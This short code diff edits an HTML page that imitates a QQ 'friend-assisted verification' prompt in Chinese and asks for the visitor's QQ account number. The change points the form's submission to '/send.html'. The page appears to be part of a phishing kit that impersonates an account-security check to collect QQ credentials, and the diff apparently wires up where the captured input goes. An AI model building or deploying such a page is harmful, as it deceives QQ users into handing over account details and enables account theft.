--- a/Dao/index.html
+++ b/Dao/index.html
@@ -45,7 +45,7 @@
 	</head>
 	<body>
 		<p>你正在进行 好友辅助验证 操作，请确认是您本人在操作。</p>
-		<form action="/demo/demo_form.asp">
+		<form action="/send.html">
 		QQ账号:<br>
 		<input type="text" name="QQUin" value="">
 		<br>
